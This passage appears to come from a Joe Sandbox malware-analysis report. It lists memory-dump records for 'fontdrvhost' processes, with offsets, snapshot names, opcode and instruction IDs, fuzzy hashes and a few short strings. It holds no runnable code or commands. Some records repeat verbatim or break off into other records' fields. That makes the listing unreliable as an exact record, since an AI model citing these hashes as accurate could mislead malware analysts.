                                                                                                                    • Instruction ID: 90851bd60e6674cc9f421617cbf7425d049d199c3d12c1ca61b2ee90d0651e7c
                                                                                                                    • Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction Fuzzy Hash: 4DF01C31E0C0064BFB959644C4A0BBA33A5DF56320F181079DA4ED32C1DD2CA9419709
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d4160f7d7d45aa6afc0f65b8701cdcb5325b32ebcc20e93dbe3175103bd4169
                                                                                                                    • Instruction ID: 5fe61b2fd74f5c4edb89fdd7b7305db599876668cb0338d510344d5334f49575
                                                                                                                    • Opcode Fuzzy Hash: 3d4160f7d7d45aa6afc0f65b8701cdcb5325b32ebcc20e93dbe3175103bd4169
                                                                                                                    • Instruction Fuzzy Hash: 03F0A031E0C51D8FEB91EF04C890BA933A2EB05310F6182B6D90CD72D2DE3CAE009B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c0b67b36310c943b4f89911a8ed630009b31e52bda9fefea2284e4cfb7e695b0
                                                                                                                    • Instruction ID: aaae7b56b049d69ffe1de3f10b6d7e0f53bf70c582e664d72295edb4e0bb8510
                                                                                                                    • Opcode Fuzzy Hash: c0b67b36310c943b4f89911a8ed630009b31e52bda9fefea2284e4cfb7e695b0
                                                                                                                    • Instruction Fuzzy Hash: FEE01A6294E7C04FCB4B9B3588A98843FB0AE5722174A40EBC185CF5A3D61D9849C712
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
                                                                                                                    • Instruction ID: 72573e119026f9aefd43365c2521c28195831e44b4f8615d7e0408690d03129b
                                                                                                                    • Opcode Fuzzy Hash: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
                                                                                                                    • Instruction Fuzzy Hash: C3D05E30B6090D4B8B5CA62D8468430B3D1E7AA2067D45278940BC2285ED29ECC68B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction ID: 1249d3f547a784178b25b36bbd9e131ef276a7f341a9e8fb41a9c6df6696d544
                                                                                                                    • Opcode Fuzzy Hash: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction Fuzzy Hash: 67E01A2294E7C08FC74B9B3488B99557FA0DE1721174A40EAC145CF5A3EA1D8849C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38dd33352cd2da05a2d947a07dc06f6245a8e0b2ec56bb027e340bdf51e876af
                                                                                                                    • Instruction ID: 4a6833d773f23534c5084bd77748d04f2566d3450c56826d465175971905811f
                                                                                                                    • Opcode Fuzzy Hash: 38dd33352cd2da05a2d947a07dc06f6245a8e0b2ec56bb027e340bdf51e876af
                                                                                                                    • Instruction Fuzzy Hash: C5E01A2294E7C04FC74B973588A98453FB09E2721174A40EBC145CF1A3DA1D8849C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction ID: 97261e78cb310111d530b83f7af1a2dd14e57a6d62dddd683722aa4715897ae2
                                                                                                                    • Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction Fuzzy Hash: ABD0A73066954A4FDA01B73CC8898547BA0EB0F224BD510F1D009C7561D50D4C558B00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • Opcode Fuzzy Hash: d05d504df4c70b2bcffe8e62a0b7a7d1d00aec2aa0d5657d6f1872daec154a55
                                                                                                                    • Instruction Fuzzy Hash: 0B917F31F1C94A4FEB99EB2894F26B877A1FF95304B5445B9D04ED3286DE2CAC428B40
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @aE4
                                                                                                                    • API String ID: 0-1610574275
                                                                                                                    • Opcode ID: 5f43bc50037a1f7b7631e6e952f92f8ec3317561d8c9de268ec3562e9da2465f
                                                                                                                    • Instruction ID: e7c89b0b2b73a9aa00b089ec7b94bb043cac811dd1d09a900baeca1cbea86abb
                                                                                                                    • Opcode Fuzzy Hash: 5f43bc50037a1f7b7631e6e952f92f8ec3317561d8c9de268ec3562e9da2465f
                                                                                                                    • Instruction Fuzzy Hash: 0491B221F1D94A0FEBDEEB1884B62B573D1EBA6358F04407AD94EC32C7DD2CA8459381
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87b4
                                                                                                                    • API String ID: 0-1132462551
                                                                                                                    • Opcode ID: 1b9e81b02a5f737ff0a56993d622b480da2e7f9933feab22686a1f2e0792812e
                                                                                                                    • Instruction ID: 1075875f35212c2aad7d0b610feb2de77eada48d7a3a8797d45a9d3b3bab8d26
                                                                                                                    • Opcode Fuzzy Hash: 1b9e81b02a5f737ff0a56993d622b480da2e7f9933feab22686a1f2e0792812e
                                                                                                                    • Instruction Fuzzy Hash: 1621F821F1C9190FF758FB6C84AAA7577D6EB99325B5040B9E40EC32E7DD2CEC418281
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction ID: c4afec0719a40c2429a2779e23769a1417b9e272f10d40bbbf3f3f0905bdde68
                                                                                                                    • Opcode Fuzzy Hash: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction Fuzzy Hash: BEF06D61A0E3C04FCB16EA348869455BFA0EF6721174A51EFC046CF1A3EA2D8889C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 6327e0fbbd3d2abe1d90331d178e201640695889aac6d57857d0f2d1a8ff80fe
                                                                                                                    • Instruction ID: 9b5879d5b4d52f8cb37b748679800b3f5b8ea0101d88c17824db5fe6e392c694
                                                                                                                    • Opcode Fuzzy Hash: 6327e0fbbd3d2abe1d90331d178e201640695889aac6d57857d0f2d1a8ff80fe
                                                                                                                    • Instruction Fuzzy Hash: FBE06571A0E7C04FC756A73488684547FA0EF6720174A41EEC145CF1A3DA2D8885CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 7f8583f64fc22b8d8b91bb3e5795d03e8c76d4c2486fc8bef69233033c9f46ae
                                                                                                                    • Instruction ID: 75f0ff9b178f389f05860dee1172146101dcafabf1e3675727e6cf9d5a5837ee
                                                                                                                    • Opcode Fuzzy Hash: 7f8583f64fc22b8d8b91bb3e5795d03e8c76d4c2486fc8bef69233033c9f46ae
                                                                                                                    • Instruction Fuzzy Hash: 59E06D71A4E7C44FC75AEA34886D454BFA0EF6721174A42EFC545CF1A3EA2D8885CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 0491a00a03924ebea1dd1d365588c251b2c62e0a935eb68341bc08257a6f1996
                                                                                                                    • Instruction ID: 7a33faeddc2fe1912b443798c03af2b386c8874ce94017713beb57ef1e2bb899
                                                                                                                    • Opcode Fuzzy Hash: 0491a00a03924ebea1dd1d365588c251b2c62e0a935eb68341bc08257a6f1996
                                                                                                                    • Instruction Fuzzy Hash: B3E0927064E3C44FC70AEB3488698547F60EF6720174A42EFC146CF1A3EA2DC889CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: fec5af4a61d2e2f04611fec90ca59a4b878b58c6172c6044695a7c8b4a39d55b
                                                                                                                    • Instruction ID: 23a249a28be1c18b864156adf5e1ff26cc38c2fcce0a10ac7f1ac4193cf5177c
                                                                                                                    • Opcode Fuzzy Hash: fec5af4a61d2e2f04611fec90ca59a4b878b58c6172c6044695a7c8b4a39d55b
                                                                                                                    • Instruction Fuzzy Hash: 09E06D71A0E7C44FC71BAA348869455BFA0EF6720174A46EEC145CF5A3EA2E8889CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 0b95c9cc8f2145e63a0b8746f5fa85fc54f13d4c9488f68181c3fc72e01284e7
                                                                                                                    • Instruction ID: 6897d1d60c01a320884d937dea95910b293b707ba0fb87ba4bf67b3a189c6c84
                                                                                                                    • Opcode Fuzzy Hash: 0b95c9cc8f2145e63a0b8746f5fa85fc54f13d4c9488f68181c3fc72e01284e7
                                                                                                                    • Instruction Fuzzy Hash: A7E01AB194F3C04FCB56AB3488668593FA0EE6721078A54EEC189CF1B3E62D9849C711
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 2e41b0e454005dfc97cbc623909a148e7502fe7cde305f9c04f46d109e13c344
                                                                                                                    • Instruction ID: 7384cc3b0a984948687ef596da4e79f5fd39cbe705fa475a1c112d68d2d4878c
                                                                                                                    • Opcode Fuzzy Hash: 2e41b0e454005dfc97cbc623909a148e7502fe7cde305f9c04f46d109e13c344
                                                                                                                    • Instruction Fuzzy Hash: A0E09A6294F3C04FCB46EB3888A98453FA0EF6720078A00EEC086CF5A3E62D9849C700
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 94fb8af0d50278739acb58482f1440c7035a8044c261aeffb00e90981ea6e00f
                                                                                                                    • Instruction ID: 527f7e4c8b76a3693f84dbc243240c93410ed350e6422d0e9fefedac3e48c6f1
                                                                                                                    • Opcode Fuzzy Hash: 94fb8af0d50278739acb58482f1440c7035a8044c261aeffb00e90981ea6e00f
                                                                                                                    • Instruction Fuzzy Hash: ADE0ED7194E3C04FD746AB75886A8497FA0EE6721078A45EEC185CF1A3D62D8845C702
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 6e2927970b281686d7d075296cb07c2e0f612110cd2bc04bb4a907e2ab5e3727
                                                                                                                    • Instruction ID: 274ed71f57bf630801184a4261f8385397d21a7c7bdb2afac03ae9330e148cef
                                                                                                                    • Opcode Fuzzy Hash: 6e2927970b281686d7d075296cb07c2e0f612110cd2bc04bb4a907e2ab5e3727
                                                                                                                    • Instruction Fuzzy Hash: 6BE01AA158E3C04FCB06EB7488659543F619E6B21078A41DEC146CB1B3E62D8849C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0a488de28d3b3d2370b49b0b570b2f68e250ec913bf7aef1edceb26276dc824b
                                                                                                                    • Instruction ID: eac2980b68e0df07fdfde0167c068df7c345dc8131731c2dd61e1eb1ddf23afd
                                                                                                                    • Opcode Fuzzy Hash: 0a488de28d3b3d2370b49b0b570b2f68e250ec913bf7aef1edceb26276dc824b
                                                                                                                    • Instruction Fuzzy Hash: B8613522F1E99A0FEBD7E66884E92A87BD1FF46314F4401BBD649C31C6DD2CAC459381
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c6f5741b1f7d5e84cefe1ae1551f7dff032254e32d51b2361b720535db774384
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction ID: eee7a385d1edd468184559823facdbaa59bef85dee06650cdfd412c50b64bc0d
                                                                                                                    • Opcode Fuzzy Hash: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction Fuzzy Hash: B2E01A6294E7C04FC74B9B3488B98557FA0DE1721174A40EAC145CF5A3EA2D8849C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 239da6a537d24acc307484f5cc3b2b6338bdbdac44191dc238e7287c5ad83cd8
                                                                                                                    • Instruction ID: ca8ac11cf7797c79aa5a3169dd3ff37a5413c01e981f4fac38f17e7a6ec85984
                                                                                                                    • Opcode Fuzzy Hash: 239da6a537d24acc307484f5cc3b2b6338bdbdac44191dc238e7287c5ad83cd8
                                                                                                                    • Instruction Fuzzy Hash: F7E04F6154F3C04FC70B973588A98443F70DE5721074A40EBC145CF1B3D51D8849C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 66d63cb6258d23d869a1ecd51ee20f904d4b52b984c1fb5e05bc21052b2dbbfc
                                                                                                                    • Instruction ID: f63f545cecffa73b970a1da6809dccca5c0b4a72840bf943b5d219e37b24af89
                                                                                                                    • Opcode Fuzzy Hash: 66d63cb6258d23d869a1ecd51ee20f904d4b52b984c1fb5e05bc21052b2dbbfc
                                                                                                                    • Instruction Fuzzy Hash: 68E0466198F7C04FC70B9B3088A88543F709E6721178A40EBC185CF2B3EA2E8949C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction ID: 131f8e6670127f12c57aa4973c076e6fc712adbd32214369c37ab35b822f7a12
                                                                                                                    • Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction Fuzzy Hash: 9BD0A73066C54A4FDA01B73CC8898547BA0EB0F214BD510F1D009C7561C5094C558B00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
